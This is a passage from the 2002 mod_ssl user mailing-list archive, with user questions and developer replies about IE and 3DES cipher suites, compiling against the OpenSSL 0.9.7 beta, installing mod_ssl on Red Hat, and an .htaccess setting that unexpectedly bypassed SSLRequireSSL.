User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun  3 21:02:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA17902; Mon, 3 Jun 2002 21:01:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from AEX01.anchieta.local id UAA17734; Mon, 3 Jun 2002 20:59:29 +0200 (MET DST)
Subject: RES: Internet Explorer and 3DES
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Date: Mon, 3 Jun 2002 15:59:42 -0300
X-MimeOLE: Produced By Microsoft Exchange V6.0.4712.0
content-class: urn:content-classes:message
Message-ID: 
Thread-Topic: Internet Explorer and 3DES
Thread-Index: AcILMKtD3bBDmcSNQyCs+bCX2To7DAAAAgaA
From: "Angelo Marcos Rigo" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id VAA17793
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Angelo Marcos Rigo" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

wheredi i find sign.sh
in the opensslpackage?
> ----- Mensagem original -----
> De:		Matthew J. Fanto [SMTP:mfanto@nist.gov]
> Enviada em:		domingo, 2 de junho de 2002 15:20
> Para:		modssl-users@modssl.org
> Assunto:		Internet Explorer and 3DES
> 
> I am having a problem with mod_ssl and Internet Explorer 6.0. I have
> set 
> mod_ssl to only allow 3DES CipherSuites (SSLCipherSuite 3DES:!MD5).
> All 
> browsers handle this fine except Internet Explorer, which only works
> if RC4 
> is enabled. When the user views the page, they see a "Cannot find
> server" 
> message. I have checked the output of ssldump, and see that the 
> client/server negotiate a cipher suite
> (SSL_RSA_WITH_3DES_EDE_CBC_SHA). 
> After ChangeCipherSpec the client closes the connection then
> reestablishes 
> it. When it is reestablished, it gets to application_data, but the
> user 
> never see's this. Can anyone point me in the right direction on
> solving this?
> 
> 
> Matthew J. Fanto
> matthew.j.fanto@nist.gov
> Computer Security Division
> National Institute of Standards and Technology (NIST)
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun  3 21:44:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA20093; Mon, 3 Jun 2002 21:43:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id VAA20072; Mon, 3 Jun 2002 21:43:01 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g53Jghl29520;
	Mon, 3 Jun 2002 15:42:43 -0400
Date: Mon, 3 Jun 2002 15:42:43 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: Ekkehard Ellmann LRT1 
cc: modssl-users@modssl.org
Subject: Re: mod_ssl-2.8.8-1.3.24
In-Reply-To: <3CFB6E7C.E9C27B3@i01p01.lrt.unibw-muenchen.de>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, 3 Jun 2002, Ekkehard Ellmann LRT1 wrote:

> Running  make in apache 1.3.24 gave a compile-error in
> apache_1.3.24/src/modules/ssl/ssl_engine_vars.c
> The  compiler pointed  at the line:
> { "UID",   NID_uniqueIdentifier       },
>
> (linux-2.2.17,  apache-1.3.24,  mod_ssl-2.8.8-1.3.24,
> openssl-0.9.7-beta1)

Many changes have occurred between OpenSSL 0.9.6 and 0.9.7.  mod_ssl is
unlikely to work with 0.9.7 at the moment, even if this were fixed.  Stick
with 0.9.6 for now.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun  3 22:26:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA22055; Mon, 3 Jun 2002 22:25:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from falla.videotron.net id WAA22040; Mon, 3 Jun 2002 22:24:51 +0200 (MET DST)
Received: from betty.localnet ([24.202.164.28])
 by falla.videotron.net (Sun Internet Mail Server sims.3.5.1999.12.14.10.29.p8)
 with ESMTP id <0GX500G5LCP72Y@falla.videotron.net> for modssl-users@modssl.org; Mon,  3 Jun 2002 16:24:43 -0400 (EDT)
Received: from localhost ([127.0.0.1] ident=geoff) by betty.localnet with esmtp (Exim 3.35 #1 (Debian))
 id 17EyNf-0000Fg-00; Mon, 03 Jun 2002 16:24:43 -0400
Date: Mon, 03 Jun 2002 16:24:43 -0400 (EDT)
From: Geoff Thorpe 
Subject: Re: mod_ssl-2.8.8-1.3.24
In-reply-to: 
To: modssl-users@modssl.org
Message-id: 
MIME-version: 1.0
Content-type: TEXT/PLAIN; charset=US-ASCII
X-X-Sender: geoff@betty.localnet
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

On Mon, 3 Jun 2002, Cliff Woolley wrote:

> On Mon, 3 Jun 2002, Ekkehard Ellmann LRT1 wrote:
>
> > Running  make in apache 1.3.24 gave a compile-error in
> > apache_1.3.24/src/modules/ssl/ssl_engine_vars.c
> > The  compiler pointed  at the line:
> > { "UID",   NID_uniqueIdentifier       },
> >
> > (linux-2.2.17,  apache-1.3.24,  mod_ssl-2.8.8-1.3.24,
> > openssl-0.9.7-beta1)
>
> Many changes have occurred between OpenSSL 0.9.6 and 0.9.7.  mod_ssl is
> unlikely to work with 0.9.7 at the moment, even if this were fixed.  Stick
> with 0.9.6 for now.

Ummm ... I had generally been using 0.9.7-dev CVS with mod_ssl without any
great grief for some time. I would go so far as to guess what the problem
is ... modssl's (auto)configuration script does a couple of regexp checks
on the openssl version to tweak building. I remember thinking the choice
of filtering was odd, and it's quite possible that the version being
interpreted from the beta release is confusing the config checks.

At a guess, the UID issue is probably one where Ralf has a fallback
implementation in modssl for older versions of openssl that didn't have
it. Was the compiler/linker warning about conflicting definitions between
openssl libs and modssl? If so, try checking out the "configure" script
where it attempts to parse the openssl version. I can't look at this right
now but if you can't get it sorted feel free to mail me back in a day or
two and perhaps I will have time. Basically you'd want modssl to convince
itself that the beta is the same sort of thing as "0.9.7-dev".

OTOH: It might be something else different altogether :-)

Cheers,
Geoff

-- 
Geoff Thorpe, geoff(at)geoffthorpe(dot)net

2000 years on, it's a different empire but the same
zealots and the same attrocities.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun  3 23:33:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA24964; Mon, 3 Jun 2002 23:32:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id XAA24949; Mon, 3 Jun 2002 23:31:53 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g53LVZP29768;
	Mon, 3 Jun 2002 17:31:35 -0400
Date: Mon, 3 Jun 2002 17:31:35 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: Geoff Thorpe 
cc: modssl-users@modssl.org
Subject: Re: mod_ssl-2.8.8-1.3.24
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, 3 Jun 2002, Geoff Thorpe wrote:

> Ummm ... I had generally been using 0.9.7-dev CVS with mod_ssl without any
> great grief for some time.

Hm.  Okay, well, you're luckier than the httpd committer who tried it.
:)  At least with Apache 2.0, many things have been rumored to break under
the stock mod_ssl with OpenSSL 0.9.7-dev.  YMMV.  Of course my
recommendation to stick with 0.9.6 for now stands.  :)



--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun  4 16:42:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA14730; Tue, 4 Jun 2002 16:41:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from lclweb.lclcan.com id QAA14724; Tue, 4 Jun 2002 16:40:56 +0200 (MET DST)
Received: (from uucp@localhost)
	by lclweb.lclcan.com (8.9.3/8.9.3) id KAA16940
	for ; Tue, 4 Jun 2002 10:55:06 -0400
Received: from olympus.lclcan.com(205.205.137.131) by lclweb.lclcan.com via smap (V2.1)
	id sma016931; Tue, 4 Jun 02 10:55:03 -0400
Received: from doctor (doctor.lclcan.com [205.205.137.151]) by olympus.lclcan.com (8.8.8/SCO5) with SMTP id KAA10056 for ; Tue, 4 Jun 2002 10:39:46 -0400 (EDT)
Message-ID: <011601c20bd5$dee22f60$c889cdcd@lclcan.com>
From: "Don" 
To: 
Subject: Installing ModSSL Question
Date: Tue, 4 Jun 2002 10:41:06 -0400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0113_01C20BB4.54A4CAE0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4807.1700
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Don" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0113_01C20BB4.54A4CAE0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hi,

I'm new to this so please bare with me.  I am running RedHat Linux 6.2 =
with Apache 1.3.22 and OpenSSL 0.9.6d.  I wish to install ModSSL so that =
I can secure my web site.

I have downloaded the mod_ssl-2.8.5-1.3.22 tarball from the web site.  =
Upon reading the documentation, I find that I need to recompile apache =
with additional configuration options in order to install ModSSL.

Here is my dilemma.  I never compiled Apache from source but rather =
installed from rpm packages.  Therefore, there doesn't seem to be any =
way I can install ModSSL.  I've looked at the FAQ but can see no hints =
on installing ModSSL once Apache is installed.  Neither have I found and =
ModSSL rpm package.

I DON'T want to download the Apache tarball and compile/install if I can =
help it because RedHat is a bit screwy as it uses it's own directories.  =
Installing Apache from the tarball will undoubtedly mess up my system as =
it will install in other directories and confuse the hell out of me.

Do I have other options?

Thanks,
Don
------=_NextPart_000_0113_01C20BB4.54A4CAE0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Hi,


 


I'm new to this so please bare with =
me.  I am=20
running RedHat Linux 6.2 with Apache 1.3.22 and OpenSSL 0.9.6d.  I =
wish to=20
install ModSSL so that I can secure my web site.


 


I have downloaded the =
mod_ssl-2.8.5-1.3.22 tarball=20
from the web site.  Upon reading the documentation, I find that I =
need to=20
recompile apache with additional configuration options in order to =
install=20
ModSSL.


 


Here is my dilemma.  I never =
compiled Apache=20
from source but rather installed from rpm packages.  Therefore, =
there=20
doesn't seem to be any way I can install ModSSL.  I've looked at =
the FAQ=20
but can see no hints on installing ModSSL once Apache is =
installed. =20
Neither have I found and ModSSL rpm package.


 


I DON'T want to download the Apache =
tarball and=20
compile/install if I can help it because RedHat is a bit screwy as it =
uses it's=20
own directories.  Installing Apache from the tarball will =
undoubtedly mess=20
up my system as it will install in other directories and confuse the =
hell out of=20
me.


 


Do I have other options?


 


Thanks,


Don


------=_NextPart_000_0113_01C20BB4.54A4CAE0--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun  4 16:59:33 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA15443; Tue, 4 Jun 2002 16:58:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from blade.devel.redhat.com id QAA15430; Tue, 4 Jun 2002 16:58:08 +0200 (MET DST)
Received: from blade.devel.redhat.com (localhost.localdomain [127.0.0.1])
	by blade.devel.redhat.com (8.12.3/8.12.3) with ESMTP id g54EvtPf010838
	for ; Tue, 4 Jun 2002 10:57:55 -0400
Received: (from nalin@localhost)
	by blade.devel.redhat.com (8.12.3/8.12.3/Submit) id g54EvtwC010836
	for modssl-users@modssl.org; Tue, 4 Jun 2002 10:57:55 -0400
Date: Tue, 4 Jun 2002 10:57:55 -0400
From: Nalin Dahyabhai 
To: modssl-users@modssl.org
Subject: Re: Installing ModSSL Question
Message-ID: <20020604145755.GA10641@redhat.com>
References: <011601c20bd5$dee22f60$c889cdcd@lclcan.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <011601c20bd5$dee22f60$c889cdcd@lclcan.com>
User-Agent: Mutt/1.4i
X-Random-Fortune: paranoia, n.: A healthy understanding of the way the universe works.
Organization: Red Hat, Inc.
X-Department: OS Development
X-Disclaimer: I am not a spokesmodel.  Views expressed are my own.
X-Key-ID: 2537B551
X-Key-Fingerprint: 44D4 B47B 392A 7A64 1D72  08E2 236F 3E15 2537 B551
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Nalin Dahyabhai 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, Jun 04, 2002 at 10:41:06AM -0400, Don wrote:
> I have downloaded the mod_ssl-2.8.5-1.3.22 tarball from the web site.  Upon reading the documentation, I find that I need to recompile apache with additional configuration options in order to install ModSSL.
> 
> Here is my dilemma.  I never compiled Apache from source but rather installed from rpm packages.  Therefore, there doesn't seem to be any way I can install ModSSL.  I've looked at the FAQ but can see no hints on installing ModSSL once Apache is installed.  Neither have I found and ModSSL rpm package.

The packaged version for Red Hat Linux already has the necessary EAPI
patch applied.  You should be able to either compile mod_ssl using apxs
(which is included in the apache-devel package) or rebuild a mod_ssl RPM
package from a later release using 'rpm --rebuild' (though I haven't done
that lately, YMMV).

HTH,

Nalin
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun  4 19:24:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA24427; Tue, 4 Jun 2002 19:23:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from serv01.aet.tu-cottbus.de id TAA24406; Tue, 4 Jun 2002 19:22:21 +0200 (MET DST)
Received: from localhost (localhost [127.0.0.1])
	by serv01.aet.tu-cottbus.de (Postfix) with ESMTP id B468A2046
	for ; Tue,  4 Jun 2002 19:22:20 +0200 (METDST)
Received: by serv01.aet.tu-cottbus.de (Postfix, from userid 11019)
	id 3F4A02040; Tue,  4 Jun 2002 19:22:18 +0200 (METDST)
Date: Tue, 4 Jun 2002 19:22:18 +0200
From: Lutz Jaenicke 
To: modssl-users@modssl.org
Subject: Re: mod_ssl-2.8.8-1.3.24
Message-ID: <20020604172217.GA27672@serv01.aet.tu-cottbus.de>
Mail-Followup-To: modssl-users@modssl.org
References:  
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.4i
Organization: BTU Cottbus, Allgemeine Elektrotechnik
X-Virus-Scanned: by AMaViS snapshot-20011031
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lutz Jaenicke 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, Jun 03, 2002 at 04:24:43PM -0400, Geoff Thorpe wrote:
> On Mon, 3 Jun 2002, Cliff Woolley wrote:
> 
> > On Mon, 3 Jun 2002, Ekkehard Ellmann LRT1 wrote:
> >
> > > Running  make in apache 1.3.24 gave a compile-error in
> > > apache_1.3.24/src/modules/ssl/ssl_engine_vars.c
> > > The  compiler pointed  at the line:
> > > { "UID",   NID_uniqueIdentifier       },
> > >
> > > (linux-2.2.17,  apache-1.3.24,  mod_ssl-2.8.8-1.3.24,
> > > openssl-0.9.7-beta1)
> >
> > Many changes have occurred between OpenSSL 0.9.6 and 0.9.7.  mod_ssl is
> > unlikely to work with 0.9.7 at the moment, even if this were fixed.  Stick
> > with 0.9.6 for now.
 
> At a guess, the UID issue is probably one where Ralf has a fallback
> implementation in modssl for older versions of openssl that didn't have
> it. Was the compiler/linker warning about conflicting definitions between
> openssl libs and modssl? If so, try checking out the "configure" script
> where it attempts to parse the openssl version. I can't look at this right
> now but if you can't get it sorted feel free to mail me back in a day or
> two and perhaps I will have time. Basically you'd want modssl to convince
> itself that the beta is the same sort of thing as "0.9.7-dev".

The UID thing was only changed recently in the 0.9.7 tree, and (without
checking) would guess that it was even made after the last release of
mod_ssl, so I would not be sure it is already covered.

Best regards,
	Lutz
-- 
Lutz Jaenicke                             Lutz.Jaenicke@aet.TU-Cottbus.DE
http://www.aet.TU-Cottbus.DE/personen/jaenicke/
BTU Cottbus, Allgemeine Elektrotechnik
Universitaetsplatz 3-4, D-03044 Cottbus
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun  4 19:27:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA24587; Tue, 4 Jun 2002 19:26:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from serv01.aet.tu-cottbus.de id TAA24577; Tue, 4 Jun 2002 19:25:43 +0200 (MET DST)
Received: from localhost (localhost [127.0.0.1])
	by serv01.aet.tu-cottbus.de (Postfix) with ESMTP id 9F21E2046
	for ; Tue,  4 Jun 2002 19:25:42 +0200 (METDST)
Received: by serv01.aet.tu-cottbus.de (Postfix, from userid 11019)
	id 58C542040; Tue,  4 Jun 2002 19:25:40 +0200 (METDST)
Date: Tue, 4 Jun 2002 19:25:40 +0200
From: Lutz Jaenicke 
To: modssl-users@modssl.org
Subject: Re: mod_ssl-2.8.8-1.3.24
Message-ID: <20020604172540.GB27672@serv01.aet.tu-cottbus.de>
Mail-Followup-To: modssl-users@modssl.org
References:  
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.4i
Organization: BTU Cottbus, Allgemeine Elektrotechnik
X-Virus-Scanned: by AMaViS snapshot-20011031
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lutz Jaenicke 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, Jun 03, 2002 at 05:31:35PM -0400, Cliff Woolley wrote:
> On Mon, 3 Jun 2002, Geoff Thorpe wrote:
> 
> > Ummm ... I had generally been using 0.9.7-dev CVS with mod_ssl without any
> > great grief for some time.
> 
> Hm.  Okay, well, you're luckier than the httpd committer who tried it.
> :)  At least with Apache 2.0, many things have been rumored to break under
> the stock mod_ssl with OpenSSL 0.9.7-dev.  YMMV.  Of course my
> recommendation to stick with 0.9.6 for now stands.  :)

I don't care for rumores. The API of 0.9.7 is more or less unchanged.
However: mod_ssl tends to work around the existing API and directly
access internal structures and I am afraid that the Apache 2.0 version
might stick to this tradition.
In any case: OpenSSL 0.9.7 is now in beta and we need to find out these
issues. I don't have an Apache 2.0 installation seen, yet...
The mod_ssl for Apache 2.0 developers are thus strongly encouraged to
test and report, so that the issues can be sorted out.

Best regards,
	Lutz
-- 
Lutz Jaenicke                             Lutz.Jaenicke@aet.TU-Cottbus.DE
http://www.aet.TU-Cottbus.DE/personen/jaenicke/
BTU Cottbus, Allgemeine Elektrotechnik
Universitaetsplatz 3-4, D-03044 Cottbus
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun  4 22:27:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA04955; Tue, 4 Jun 2002 22:26:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from VL-MS-MR001.sc1.videotron.ca id WAA04951; Tue, 4 Jun 2002 22:26:03 +0200 (MET DST)
Received: from toilet ([24.202.164.28]) by
          VL-MS-MR001.sc1.videotron.ca (Netscape Messaging Server 4.15)
          with ESMTP id GX77FD01.GA1 for ; Tue, 4
          Jun 2002 16:26:01 -0400 
Received: from toilet
	([127.0.0.1] helo=localhost ident=geoff)
	by toilet with esmtp (Exim 3.35 #1 (Debian))
	id 17FKsS-0000Ca-00; Tue, 04 Jun 2002 16:26:00 -0400
Date: Tue, 4 Jun 2002 16:26:00 -0400 (EDT)
From: Geoff Thorpe 
X-X-Sender: geoff@toilet.localnet
To: modssl-users@modssl.org
Subject: Re: mod_ssl-2.8.8-1.3.24
In-Reply-To: <20020604172217.GA27672@serv01.aet.tu-cottbus.de>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

On Tue, 4 Jun 2002, Lutz Jaenicke wrote:

> The UID thing was only changed recently in the 0.9.7 tree, and (without
> checking) would guess that it was even made after the last release of
> mod_ssl, so I would not be sure it is already covered.

Ah, thanks for clarifying Lutz. Unfortunately, the original poster did not
include any information about *how* the compilation was breaking on the
"UID" line of code, so I'll now go back into hibernation ...

Cheers,
Geoff


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun  4 22:42:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA05648; Tue, 4 Jun 2002 22:41:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from serv01.aet.tu-cottbus.de id WAA05600; Tue, 4 Jun 2002 22:40:22 +0200 (MET DST)
Received: from localhost (localhost [127.0.0.1])
	by serv01.aet.tu-cottbus.de (Postfix) with ESMTP id C28B5204D
	for ; Tue,  4 Jun 2002 22:40:21 +0200 (METDST)
Received: by serv01.aet.tu-cottbus.de (Postfix, from userid 11019)
	id 76182204C; Tue,  4 Jun 2002 22:40:19 +0200 (METDST)
Date: Tue, 4 Jun 2002 22:40:19 +0200
From: Lutz Jaenicke 
To: modssl-users@modssl.org
Subject: Re: mod_ssl-2.8.8-1.3.24
Message-ID: <20020604204019.GA2791@serv01.aet.tu-cottbus.de>
Mail-Followup-To: modssl-users@modssl.org
References: <20020604172217.GA27672@serv01.aet.tu-cottbus.de> 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.4i
Organization: BTU Cottbus, Allgemeine Elektrotechnik
X-Virus-Scanned: by AMaViS snapshot-20011031
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lutz Jaenicke 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, Jun 04, 2002 at 04:26:00PM -0400, Geoff Thorpe wrote:
> On Tue, 4 Jun 2002, Lutz Jaenicke wrote:
> 
> > The UID thing was only changed recently in the 0.9.7 tree, and (without
> > checking) would guess that it was even made after the last release of
> > mod_ssl, so I would not be sure it is already covered.
> 
> Ah, thanks for clarifying Lutz. Unfortunately, the original poster did not
> include any information about *how* the compilation was breaking on the
> "UID" line of code, so I'll now go back into hibernation ...

Due to a naming clash with the LDAP RFC, UniqueIdentifier was renamed to
the correct value X509UniqueIdentifier, therefore the NID_UniqueIdentifier
macro was also renamed and now is no longer available.

Best regards,
	Lutz
-- 
Lutz Jaenicke                             Lutz.Jaenicke@aet.TU-Cottbus.DE
http://www.aet.TU-Cottbus.DE/personen/jaenicke/
BTU Cottbus, Allgemeine Elektrotechnik
Universitaetsplatz 3-4, D-03044 Cottbus
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun  5 01:59:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA16071; Wed, 5 Jun 2002 01:58:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from Stimpy.netroedge.com id BAA16049; Wed, 5 Jun 2002 01:57:54 +0200 (MET DST)
Received: (from phil@localhost)
	by Stimpy.netroedge.com (8.11.1/8.11.1) id g54NxMQ22544
	for modssl-users@modssl.org; Tue, 4 Jun 2002 16:59:22 -0700
Date: Tue, 4 Jun 2002 16:59:22 -0700
From: phil@netroedge.com
To: modssl-users@modssl.org
Subject: SSLRequireSSL Circumvention
Message-ID: <20020604165922.E26788@Stimpy.netroedge.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.4i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: phil@netroedge.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


I seem to have accidentally circumvented the SSLRequireSSL directive. 
Here's what my .htaccess file looks like: 

SSLRequireSSL
DirectoryIndex index.wp2
AddHandler cgi-script .cgi
Options +ExecCGI
deny from all
AuthType Basic
AuthUserFile /yadda/yadda/path/to/site/root/admin/.htpasswd
AuthName "Administrative Pages"
require valid-user
satisfy any

(I obscured the AuthUserFile path here.)

My .htaccess file is being parsed and used.  And if I try to fetch a
page in the admin area, I get this logged:

[Tue Jun  4 15:46:03 2002] [error] access to /yadda/yadda/path/to/site/root/admin/index.wp2 
failed for 206.228.191.21, reason: SSL connection required

BUT, I still get the page in the browser!  Weird.  I can reload it,
punch in the URL for a new page (which isn't cached), etc.  I tried
this on a couple different client computers to be sure.

Now, I can get the expected result if I comment out the 'deny from
all' and 'satisfy any' lines.  So, I'm OK now.  Logs look right, and
the browser is refused on port 80 for the admin area, as expected.

I thought it was odd, though, that it simply isn't enought to use the
SSLRequireSSL line for working logging and authentication.  There
seems to be some interaction happening between SSLRequireSSL and the
auth configs.

The doc says this on SSLRequireSSL:

"SSLRequireSSL -

This directive forbids access unless HTTP over SSL (i.e. HTTPS) is
enabled for the current connection. This is very handy inside the
SSL-enabled virtual host or directories for defending against
configuration errors that expose stuff that should be protected. When
this directive is present all requests are denied which are not using
SSL."

But, of course, this is not true under some configuration conditions. 
Still the documentation mentioned that this is particularly helpful
for 'defending against configuration errors'.

BTW- I originally put in the 'deny from all' and 'satisfy any' lines
because I had another line 'allow from .my-domain.com' inbetween them 
at one point.  Which makes me wonder, what would I do if I wanted to
put it back in?

Anyways, I thought I would mention it because I didn't see anything
else on this inconsistency in the mail list or anywhere else for that
matter.

I'm using Apache-1.3.24 with mod_ssl-2.8.8.


Phil

-- 
Philip Edelbrock -- IS Manager -- Edge Design, Corvallis, OR
   phil@netroedge.com -- http://www.netroedge.com/~phil
 PGP F16: 01 D2 FD 01 B5 46 F4 F0  3A 8B 9D 7E 14 7F FB 7A
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun  5 02:34:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id CAA17862; Wed, 5 Jun 2002 02:33:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mail.virginia.edu id CAA17857; Wed, 5 Jun 2002 02:33:03 +0200 (MET DST)
Received: from node7.unix.virginia.edu by mail.virginia.edu id aa22912;
          4 Jun 2002 20:33 EDT
Received: from localhost (jcw5q@localhost)
	by node7.unix.Virginia.EDU (8.9.3/8.9.3) with ESMTP id UAA31714;
	Tue, 4 Jun 2002 20:32:55 -0400
X-Authentication-Warning: node7.unix.Virginia.EDU: jcw5q owned process doing -bs
